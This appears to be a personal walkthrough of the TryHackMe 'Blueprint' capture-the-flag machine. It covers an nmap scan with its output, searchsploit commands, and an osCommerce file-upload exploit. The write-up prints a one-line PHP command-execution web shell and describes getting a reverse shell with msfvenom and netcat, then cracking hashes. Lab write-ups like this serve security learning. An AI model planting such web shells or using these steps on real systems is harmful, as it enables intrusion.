sudo nmap -Pn -T4 -A -sS -p- 10.10.21.26 -oN output
This was my results from the scan:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-11 17:40 EDTNmap scan report for 10.10.21.26Host is up (0.26s latency).Not shown: 65522 closed portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 7.5| http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/7.5|_http-title: 404- File or directory not found.135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)| http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28|_http-title: Index of /| ssl-cert: Subject: commonName=localhost| Not valid before: 2009-11-10T23:48:47|_Not valid after: 2019-11-08T23:48:47|_ssl-date: TLS randomness does not represent time| tls-alpn: |_ http/1.1445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)3306/tcp open mysql MariaDB (unauthorized)8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)| http-methods: |_ Potentially risky methods: TRACE|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28|_http-title: Index of /49152/tcp open msrpc Microsoft Windows RPC49153/tcp open msrpc Microsoft Windows RPC49154/tcp open msrpc Microsoft Windows RPC49158/tcp open msrpc Microsoft Windows RPC49159/tcp open msrpc Microsoft Windows RPC49160/tcp open msrpc Microsoft Windows RPCNo exact OS matches forhost (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.91%E=4%D=7/11%OT=80%CT=1%CU=42336%PV=Y%DS=4%DC=T%G=Y%TM=60EB693OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=OS:7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M5OS:06NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=SOS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=Z%RUCK=0%RUD=G)IE(R=Y%DFI=OS:N%T=80%CD=Z)Network Distance: 4 hopsService Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: -20m09s, deviation: 34m37s, median: -10s|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:66:56:3b:ba:8d (unknown)| smb-os-discovery: | OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)| OS CPE: cpe:/o:microsoft:windows_7::sp1| Computer name: BLUEPRINT| NetBIOS computer name: BLUEPRINT\x00| Workgroup: WORKGROUP\x00|_ System time: 2021-07-11T22:56:59+01:00| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode: |2.02: |_ Message signing enabled but not required| smb2-time: | date: 2021-07-11T21:56:58|_ start_date: 2021-07-11T21:20:08TRACEROUTE (using port 1723/tcp)HOP RTT ADDRESS137.64 ms 10.6.0.12 ... 34132.33 ms 10.10.21.26OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 995.72 seconds
The first thing I did was go to the websites on port 80 and 443 to see what is going on there. I got the following result:
This seemed to be some sort of selling website so I was not sure if this is what I am looking for. Port 443 and 8080 lead me to the same result:
I then ran gobuster on the "oscommerce" url and got the following result:
I was looking around the directories and did not find anything significant. A lot of the directories showed me the following page:
I then viewed this write-up, and realized that my search was missing the "Install" directory. I then ran a search using feroxbuster, and I got the result so much quicker:
Here, I then saw the "Install" directory. This page was still the same as before:
I then saw the same write-up, and noticed that they used searchsploit in order to search for a vulnerability for the machine. I then got this result:
I wanted to try out the Arbitrary File Upload first. To get this in my current directory, I ran the following commands:
searchsploit -p php/webapps/43191.py #Shows the full path for the codecp /usr/share/exploitdb/exploits/php/webapps/43191.py . #copies it to the local directory
I ran the code just by itself to see what parameters it was looking for:
I noticed that I needed a target (at least), authentication, and file. I tried to enter in just the target argument. I then realized I did not have the username and password for the authentication. I then went back to the install page in the catalog directory:
I then clicked on the start button to see what it did. I entered root for the username and the Database Name and then press continue:
I tried admin for the Username, and I ran into an error. I then tried root and it worked! I then set the Online Store Settings like:
All the previous setup for the commerce site was based off of the same write-up. I then got the following page:
I was then lost about where to go from here. I then looked at the write-up and learned that I had to upload a basic PHP file:
<?php passthru($_GET['cmd']);?>
I then ran the python file with the modules:
I then realized I had made a mistake. In my python command, I had added a "/" in the URL when I was not supposed to do so. After that, I was successful:
I will be honest, at this part, I had to look back at the write-up because I was out of the TryHackMe game for a while, and was not sure what to do. The next item I had to do was get a reverse shell on the machine. In order to do this, I would have to use msfvenom in order to do so:
Now I can run a netcat listener and then go to the webpage with the executable on it:
I then ran systeminfo in order to gain information about the system. I then got the following result:
Using crackstation, I was able to crack one of the two hashes:
This was the answer to one of the questions on the machine. The second answer was the root.txt file "password". I got to this through changing directory by "cd-ing" into the directory and then running the following command: